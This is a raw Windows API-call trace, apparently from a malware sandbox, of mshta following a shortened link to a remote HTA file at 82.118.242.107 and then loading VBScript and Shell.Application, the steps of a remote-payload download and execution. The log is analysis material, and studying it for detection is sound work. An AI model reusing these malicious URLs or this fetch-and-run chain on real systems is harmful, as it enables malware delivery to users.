[0081.971] IInternetSecurityManager:GetSecurityId (in: This=0x426ed8, pwszUrl="about:blank", pbSecurityId=0x3be710, pcbSecurityId=0x3be704*=0x200, dwReserved=0x0 | out: pbSecurityId=0x3be710*=0x61, pcbSecurityId=0x3be704*=0xf) returned 0x0
[0081.986] DllGetClassObject (in: rclsid=0x422e28*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x3bdc90*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x3bd348 | out: ppv=0x3bd348*=0x74408c70) returned 0x0
[0081.986] IUnknown:AddRef (This=0x74408c70) returned 0x1
[0081.986] IUnknown:Release (This=0x74408c70) returned 0x1
[0081.986] IUnknown:QueryInterface (in: This=0x74408c70, riid=0x75ac4430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x3bdf0c | out: ppvObject=0x3bdf0c*=0x74408c70) returned 0x0
[0081.986] IUnknown:Release (This=0x74408c70) returned 0x1
[0081.986] IUnknown:QueryInterface (in: This=0x74408c70, riid=0x75aeaadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x3be0cc | out: ppvObject=0x3be0cc*=0x74408c7c) returned 0x0
[0081.986] IUnknown:Release (This=0x74408c70) returned 0x1
[0081.986] IInternetProtocolInfo:ParseUrl (in: This=0x74408c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x4136f0, cchResult=0xc, pcchResult=0x3be114, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x3be114*=0xc) returned 0x0
[0081.986] IUnknown:Release (This=0x74408c7c) returned 0x1
[0081.987] DllGetClassObject (in: rclsid=0x422e28*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x75ac4430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x3bdfe0 | out: ppv=0x3bdfe0*=0x74408c70) returned 0x0
[0081.987] IUnknown:QueryInterface (in: This=0x74408c70, riid=0x75aeaadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x3be0cc | out: ppvObject=0x3be0cc*=0x74408c7c) returned 0x0
[0081.987] IUnknown:Release (This=0x74408c70) returned 0x1
[0081.987] IInternetProtocolInfo:ParseUrl (in: This=0x74408c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x4136f0, cchResult=0xc, pcchResult=0x3be124, dwReserved=0x0 | out: pwzResult="", pcchResult=0x3be124*=0x0) returned 0x800c0011
[0081.987] IUnknown:Release (This=0x74408c7c) returned 0x1
[0081.987] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x3be6e4, dwReserved=0x0 | out: ppSM=0x3be6e4*=0x427550) returned 0x0
[0081.989] IUnknown:Release (This=0x74408cb0) returned 0x1
[0081.989] IUnknown_QueryService (in: punk=0x744096a4, guidService=0x7409880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x7409880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvOut=0x424f80 | out: ppvOut=0x424f80*=0x0) returned 0x80004005
[0081.989] IUnknown:QueryInterface (in: This=0x744096a4, riid=0x75c742d8*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x3bf680 | out: ppvObject=0x3bf680*=0x744096b8) returned 0x0
[0081.989] IServiceProvider:QueryService (in: This=0x744096b8, guidService=0x7409880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x7409880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvObject=0x424f80 | out: ppvObject=0x424f80*=0x0) returned 0x80004005
[0081.989] IUnknown:Release (This=0x744096b8) returned 0x1
[0081.997] IInternetSecurityManager:SetSecuritySite (This=0x426ed8, pSite=0x425664) returned 0x0
[0081.997] IUnknown:Release (This=0x425664) returned 0x0
[0081.997] IUnknown:AddRef (This=0x425664) returned 0x28
[0081.997] IUnknown:QueryInterface (in: This=0x425664, riid=0x75ad61d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x3bf6b8 | out: ppvObject=0x3bf6b8*=0x425668) returned 0x0
[0081.997] IServiceProvider:QueryService (in: This=0x425668, guidService=0x75adf13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x75adf13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x426f00 | out: ppvObject=0x426f00*=0x0) returned 0x80004002
[0081.997] IServiceProvider:QueryService (in: This=0x425668, guidService=0x75adf12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x75adf12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x426efc | out: ppvObject=0x426efc*=0x0) returned 0x80004002
[0081.997] IServiceProvider:QueryService (in: This=0x425668, guidService=0x75acc484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x75acc484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x426ef8 | out: ppvObject=0x426ef8*=0x744096bc) returned 0x0
[0081.997] IUnknown:Release (This=0x425668) returned 0x0
[0081.997] CoTaskMemAlloc (cb=0x6d) returned 0x42f7f8
[0081.998] CoTaskMemAlloc (cb=0x9) returned 0x421628
[0081.998] StrChrW (lpStart="HTA", wMatch=0x3b) returned 0x0
[0082.002] GetAcceptLanguagesW () returned 0x0
[0082.002] GetClassNameW (in: hWnd=0x2021e, lpClassName=0x3bf69c, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9
[0082.002] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3
[0082.002] GetParent (hWnd=0x2021e) returned 0x2021c
[0082.002] GetClassNameW (in: hWnd=0x2021c, lpClassName=0x3bf69c, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9
[0082.003] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3
[0082.003] GetParent (hWnd=0x2021c) returned 0x0
[0082.004] IMoniker:GetDisplayName (in: This=0x41ffc0, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x3bf660 | out: ppszDisplayName=0x3bf660*="https://urlz.fr/8gYe") returned 0x0
[0082.004] IUnknown:QueryInterface (in: This=0x41ffc0, riid=0x740072f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x3bf638 | out: ppvObject=0x3bf638*=0x41ffcc) returned 0x0
[0082.005] IUriContainer:GetIUri (in: This=0x41ffcc, ppIUri=0x3bf668 | out: ppIUri=0x3bf668*=0x41c3cc) returned 0x0
[0082.005] IUnknown:Release (This=0x41ffcc) returned 0x1
[0082.005] IUnknown:AddRef (This=0x41ffc0) returned 0x2
[0082.005] IUnknown:AddRef (This=0x41c3cc) returned 0x5
[0082.005] IMoniker:GetDisplayName (in: This=0x41ffc0, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x3bf540 | out: ppszDisplayName=0x3bf540*="https://urlz.fr/8gYe") returned 0x0
[0082.005] UrlGetLocationW (psz1="https://urlz.fr/8gYe") returned 0x0
[0082.006] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="https://urlz.fr/8gYe", ppmk=0x3bf50c*=0x0, dwFlags=0x1 | out: ppmk=0x3bf50c*=0x42e910) returned 0x0
[0082.006] CreateUri (in: pwzURI="https://urlz.fr/8gYe", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x3bf504 | out: ppURI=0x3bf504*=0x41c3cc) returned 0x0
[0082.006] IUri:GetScheme (in: This=0x41c3cc, pdwScheme=0x3bf49c | out: pdwScheme=0x3bf49c*=0xb) returned 0x0
[0082.006] CoInternetIsFeatureEnabled (FeatureEntry=0x1, dwFlags=0x2) returned 0x1
[0082.006] IUnknown:AddRef (This=0x41c3cc) returned 0x9
[0082.006] IUri:GetAbsoluteUri (in: This=0x41c3cc, pbstrAbsoluteUri=0x42e1b0 | out: pbstrAbsoluteUri=0x42e1b0*="https://urlz.fr/8gYe") returned 0x0
[0082.006] IUnknown:Release (This=0x41c3cc) returned 0x8
[0082.006] IUnknown:AddRef (This=0x42e910) returned 0x2
[0082.007] IUnknown:Release (This=0x42e910) returned 0x1
[0082.007] IUnknown:AddRef (This=0x41ffc0) returned 0x3
[0082.007] IUnknown:Release (This=0x42e910) returned 0x0
[0082.007] IUnknown:AddRef (This=0x41ffc0) returned 0x4
[0082.007] IUnknown:QueryInterface (in: This=0x41c3cc, riid=0x7408d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x3bf30c | out: ppvObject=0x3bf30c*=0x41c3cc) returned 0x0
[0082.007] IUnknown:Release (This=0x41c3cc) returned 0x6
[0082.007] IUnknown:AddRef (This=0x41c3cc) returned 0x7
[0082.007] _wcsnicmp (_String1="https", _String2="mhtml", _MaxCount=0x5) returned -5
[0082.007] IUnknown:QueryInterface (in: This=0x41ffc0, riid=0x740072f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x3bf2e0 | out: ppvObject=0x3bf2e0*=0x41ffcc) returned 0x0
[0082.007] IUriContainer:GetIUri (in: This=0x41ffcc, ppIUri=0x3bf334 | out: ppIUri=0x3bf334*=0x41c3cc) returned 0x0
[0082.007] IUnknown:Release (This=0x41ffcc) returned 0x4
[0082.007] IUnknown:AddRef (This=0x41ffc0) returned 0x5
[0082.007] IUnknown:Release (This=0x41ffc0) returned 0x4
[0082.007] IUnknown:AddRef (This=0x41c3cc) returned 0x9
[0082.007] IUnknown:QueryInterface (in: This=0x41c3cc, riid=0x7408d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x3bf30c | out: ppvObject=0x3bf30c*=0x41c3cc) returned 0x0
[0082.007] IUnknown:Release (This=0x41c3cc) returned 0x9
[0082.007] IUnknown:AddRef (This=0x41c3cc) returned 0xa
[0082.007] IUri:GetScheme (in: This=0x41c3cc, pdwScheme=0x3bf304 | out: pdwScheme=0x3bf304*=0xb) returned 0x0
[0082.008] GetCurrentProcessId () returned 0x9ac
[0082.008] IUnknown:QueryInterface (in: This=0x41c3cc, riid=0x7408d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x3bf30c | out: ppvObject=0x3bf30c*=0x41c3cc) returned 0x0
[0082.008] IUnknown:Release (This=0x41c3cc) returned 0xa
[0082.008] IUnknown:AddRef (This=0x41c3cc) returned 0xb
[0082.008] IUri:GetScheme (in: This=0x41c3cc, pdwScheme=0x3bf2dc | out: pdwScheme=0x3bf2dc*=0xb) returned 0x0
[0082.008] IUri:GetAbsoluteUri (in: This=0x41c3cc, pbstrAbsoluteUri=0x3bf30c | out: pbstrAbsoluteUri=0x3bf30c*="https://urlz.fr/8gYe") returned 0x0
[0082.008] GetProcAddress (hModule=0x76720000, lpProcName=0x7) returned 0x76724680
[0082.008] SysStringLen (param_1="https://urlz.fr/8gYe") returned 0x14
[0082.008] CreateUri (in: pwzURI="https://urlz.fr/8gYe", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x3bf328 | out: ppURI=0x3bf328*=0x41c3cc) returned 0x0
[0082.008] IUnknown:Release (This=0x41c3cc) returned 0xb
[0082.008] IUri:GetScheme (in: This=0x41c3cc, pdwScheme=0x3bf2bc | out: pdwScheme=0x3bf2bc*=0xb) returned 0x0
[0082.008] IUnknown:AddRef (This=0x41c3cc) returned 0xc
[0082.008] IUri:GetPropertyDWORD (in: This=0x41c3cc, uriProp=0x11, pdwProperty=0x3bf09c, dwFlags=0x0 | out: pdwProperty=0x3bf09c*=0xb) returned 0x0
[0082.008] IInternetSecurityManager:GetSecurityId (in: This=0x426ed8, pwszUrl="https://urlz.fr/8gYe", pbSecurityId=0x3bf100, pcbSecurityId=0x3bf0fc*=0x200, dwReserved=0x0 | out: pbSecurityId=0x3bf100*=0x68, pcbSecurityId=0x3bf0fc*=0x11) returned 0x0
[0082.008] IInternetSecurityManager:GetSecurityId (in: This=0x744096bc, pwszUrl="https://urlz.fr/8gYe", pbSecurityId=0x3bf100, pcbSecurityId=0x3bf0fc*=0x200, dwReserved=0x0 | out: pbSecurityId=0x3bf100*=0x0, pcbSecurityId=0x3bf0fc*=0x200) returned 0x800c0011
[0082.086] IUnknown:Release (This=0x41c3cc) returned 0xb
[0082.087] IMoniker:IsSystemMoniker (in: This=0x41ffc0, pdwMksys=0x3bef98 | out: pdwMksys=0x3bef98*=0x6) returned 0x0
[0082.087] IUri:GetSchemeName (in: This=0x41c3cc, pbstrSchemeName=0x3beef0 | out: pbstrSchemeName=0x3beef0*="https") returned 0x0
[0082.087] _wcsnicmp (_String1="https", _String2="data", _MaxCount=0x5) returned 4
[0082.087] IUri:GetScheme (in: This=0x41c3cc, pdwScheme=0x3bef3c | out: pdwScheme=0x3bef3c*=0xb) returned 0x0
[0082.087] IUnknown:QueryInterface (in: This=0x41c3cc, riid=0x7408d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x3bef3c | out: ppvObject=0x3bef3c*=0x41c3cc) returned 0x0
[0082.087] IUnknown:Release (This=0x41c3cc) returned 0x13
[0082.088] IUnknown:AddRef (This=0x41c3cc) returned 0x14
[0082.089] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x3bee5c | out: phkResult=0x3bee5c*=0x318) returned 0x0
[0082.089] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x3bee60 | out: phkResult=0x3bee60*=0x310) returned 0x0
[0082.089] RegOpenKeyExW (in: hKey=0x310, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x3bee1c | out: phkResult=0x3bee1c*=0x0) returned 0x2
[0082.089] RegOpenKeyExW (in: hKey=0x318, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x3bee1c | out: phkResult=0x3bee1c*=0x31c) returned 0x0
[0082.089] SHRegGetValueW () returned 0x2
[0082.089] SHRegGetValueW () returned 0x2
[0082.089] RegCloseKey (hKey=0x31c) returned 0x0
[0082.089] RegCloseKey (hKey=0x0) returned 0x6
[0082.089] RegCloseKey (hKey=0x0) returned 0x6
[0082.089] RegCloseKey (hKey=0x318) returned 0x0
[0082.090] RegCloseKey (hKey=0x310) returned 0x0
[0082.090] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x3bee08 | out: phkResult=0x3bee08*=0x310) returned 0x0
[0082.090] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x3bee0c | out: phkResult=0x3bee0c*=0x318) returned 0x0
[0082.090] RegOpenKeyExW (in: hKey=0x318, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x3bedc8 | out: phkResult=0x3bedc8*=0x0) returned 0x2
[0082.090] RegOpenKeyExW (in: hKey=0x310, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x3bedc8 | out: phkResult=0x3bedc8*=0x0) returned 0x2
[0082.090] RegCloseKey (hKey=0x0) returned 0x6
[0082.090] RegCloseKey (hKey=0x0) returned 0x6
[0082.090] RegCloseKey (hKey=0x310) returned 0x0
[0082.090] RegCloseKey (hKey=0x318) returned 0x0
[0082.308] CoTaskMemAlloc (cb=0x8) returned 0x4374a0
[0082.322] CreateUri (in: pwzURI="https://urlz.fr/8gYe", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x3be5e0 | out: ppURI=0x3be5e0*=0x41c3cc) returned 0x0
[0082.323] IUnknown:AddRef (This=0x41c3cc) returned 0x19
[0082.323] IUnknown:QueryInterface (in: This=0x41c3cc, riid=0x7408d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x3be538 | out: ppvObject=0x3be538*=0x41c3cc) returned 0x0
[0082.323] IUnknown:Release (This=0x41c3cc) returned 0x19
[0082.323] IUnknown:AddRef (This=0x41c3cc) returned 0x1a
[0082.323] CoTaskMemAlloc (cb=0x32) returned 0x42eb10
[0082.323] IUnknown:Release (This=0x41c3cc) returned 0x19
[0082.324] IUnknown:Release (This=0x41c3cc) returned 0x17
[0082.324] IUnknown:Release (This=0x41c3cc) returned 0x16
[0082.324] IUnknown:Release (This=0x41c3cc) returned 0x15
[0082.324] CoTaskMemFree (pv=0x0)
[0082.324] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x3bf1f0 | out: lpCPInfo=0x3bf1f0) returned 1
[0082.324] IUnknown:AddRef (This=0x41c3cc) returned 0x16
[0082.324] IUnknown:QueryInterface (in: This=0x41c3cc, riid=0x7408d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x3bf1f8 | out: ppvObject=0x3bf1f8*=0x41c3cc) returned 0x0
[0082.325] IUnknown:Release (This=0x41c3cc) returned 0x16
[0082.325] IUnknown:AddRef (This=0x41c3cc) returned 0x17
[0082.325] IUri:GetScheme (in: This=0x41c3cc, pdwScheme=0x3bf1fc | out: pdwScheme=0x3bf1fc*=0xb) returned 0x0
[0082.500] IUri:GetDisplayUri (in: This=0x41c3cc, pbstrDisplayString=0x3bea98 | out: pbstrDisplayString=0x3bea98*="https://urlz.fr/8gYe") returned 0x0
[0082.500] GetWindowTextW (in: hWnd=0x2021e, lpString=0x3be638, nMaxCount=512 | out: lpString="") returned 0
[0082.500] NtdllDefWindowProc_W () returned 0x0
[0082.500] SetWindowTextW (hWnd=0x2021e, lpString="https://urlz.fr/8gYe") returned 1
[0082.500] NtdllDefWindowProc_W () returned 0x1
[0082.501] IUnknown:Release (This=0x41c3cc) returned 0x10
[0082.501] GetCurrentThreadId () returned 0x848
[0082.501] GetMessageW (in: lpMsg=0x3bf754, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3bf754) returned 1
[0082.572] TranslateMessage (lpMsg=0x3bf754) returned 0
[0082.572] DispatchMessageW (lpMsg=0x3bf754)
[0083.193] UrlGetLocationW (psz1="http://82.118.242.107/~able/1_ga/al/AXVHa.hta") returned 0x0
[0083.193] CreateUri (in: pwzURI="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x3bf25c | out: ppURI=0x3bf25c*=0x4e45a4) returned 0x0
[0083.193] IUri:GetScheme (in: This=0x4e45a4, pdwScheme=0x3bf1f4 | out: pdwScheme=0x3bf1f4*=0x2) returned 0x0
[0083.193] IUri:IsEqual (in: This=0x41c3cc, pUri=0x4e45a4, pfEqual=0x3bf23c | out: pfEqual=0x3bf23c*=0) returned 0x0
[0083.193] IUnknown:Release (This=0x41c3cc) returned 0xc
[0083.193] IUnknown:AddRef (This=0x4e45a4) returned 0xc
[0083.193] IUri:GetAbsoluteUri (in: This=0x4e45a4, pbstrAbsoluteUri=0x42e1b0 | out: pbstrAbsoluteUri=0x42e1b0*="http://82.118.242.107/~able/1_ga/al/AXVHa.hta") returned 0x0
[0083.193] IUnknown:Release (This=0x4e45a4) returned 0xb
[0083.193] IUnknown:AddRef (This=0x4e45a4) returned 0xc
[0083.193] IUri:GetPropertyDWORD (in: This=0x4e45a4, uriProp=0x11, pdwProperty=0x3befec, dwFlags=0x0 | out: pdwProperty=0x3befec*=0x2) returned 0x0
[0083.193] IInternetSecurityManager:GetSecurityId (in: This=0x426ed8, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pbSecurityId=0x3bf050, pcbSecurityId=0x3bf04c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x3bf050*=0x68, pcbSecurityId=0x3bf04c*=0x17) returned 0x0
[0083.193] IInternetSecurityManager:GetSecurityId (in: This=0x744096bc, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pbSecurityId=0x3bf050, pcbSecurityId=0x3bf04c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x3bf050*=0x0, pcbSecurityId=0x3bf04c*=0x200) returned 0x800c0011
[0083.194] IUnknown:Release (This=0x4e45a4) returned 0xb
[0083.194] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", ppmk=0x3bf288*=0x0, dwFlags=0x1 | out: ppmk=0x3bf288*=0x3341b98) returned 0x0
[0083.194] IUnknown:AddRef (This=0x3341b98) returned 0x2
[0083.194] IUnknown:Release (This=0x41ffc0) returned 0x1
[0083.194] CreateUri (in: pwzURI="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x3bf258 | out: ppURI=0x3bf258*=0x4e45a4) returned 0x0
[0083.194] IUnknown:AddRef (This=0x4e45a4) returned 0xf
[0083.194] IUri:GetAbsoluteUri (in: This=0x4e45a4, pbstrAbsoluteUri=0x42e1b4 | out: pbstrAbsoluteUri=0x42e1b4*="http://82.118.242.107/~able/1_ga/al/AXVHa.hta") returned 0x0
[0083.194] IUnknown:Release (This=0x4e45a4) returned 0xe
[0083.194] ParseURLW (in: pcszURL="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", ppu=0x3bf230 | out: ppu=0x3bf230) returned 0x0
[0083.194] IUnknown:Release (This=0x3341b98) returned 0x1
[0083.195] SetTimer (hWnd=0x10226, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008
[0083.195] GetTickCount () returned 0x2270f
[0083.195] GetCurrentThreadId () returned 0x848
[0083.195] SetEvent (hEvent=0x150) returned 1
[0083.195] Sleep (dwMilliseconds=0x0)
[0083.199] GetTickCount () returned 0x2270f
[0083.201] __dllonexit () returned 0x74fe7164
[0083.201] __dllonexit () returned 0x74fe717e
[0083.201] __dllonexit () returned 0x74fe7198
[0083.201] GetUserDefaultLCID () returned 0x409
[0083.201] GetVersion () returned 0x1db10106
[0083.201] DllGetClassObject (in: rclsid=0x422f60*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), riid=0x75d3ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x3be554 | out: ppv=0x3be554*=0x5dff90) returned 0x0
[0083.202] VBScriptEngine5:IClassFactory:CreateInstance (This=0x5dff90, pUnkOuter=0x0, riid=0x3bef00*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x3be540)
[0083.202] GetUserDefaultLCID () returned 0x409
[0083.202] GetACP () returned 0x4e4
[0083.203] GetCurrentThreadId () returned 0x848
[0083.203] GetProcAddress (hModule=0x76720000, lpProcName=0x2) returned 0x76724642
[0083.204] CDebugEventFire::IsActive () returned 0x1
[0083.204] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x3beedc | out: lpclsid=0x3beedc*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
[0083.208] SysStringLen (param_1=0x0) returned 0x0
[0083.208] GetProcAddress (hModule=0x75cf0000, lpProcName="CoGetClassObject") returned 0x75d254ad
[0083.208] CoGetClassObject (in: rclsid=0x3beedc*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x74fd4174*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x3beecc | out: ppv=0x3beecc*=0x76bb2998) returned 0x0
[0083.209] Shell:IUnknown:QueryInterface (in: This=0x76bb2998, riid=0x74fe1100*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x3beec8 | out: ppvObject=0x3beec8*=0x0) returned 0x80004002
[0083.209] Shell:IClassFactory:CreateInstance (in: This=0x76bb2998, pUnkOuter=0x0, riid=0x74fd40a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x3beed0 | out: ppvObject=0x3beed0*=0x330cb38) returned 0x0
[0083.210] Shell:IUnknown:Release (This=0x76bb2998) returned 0x1
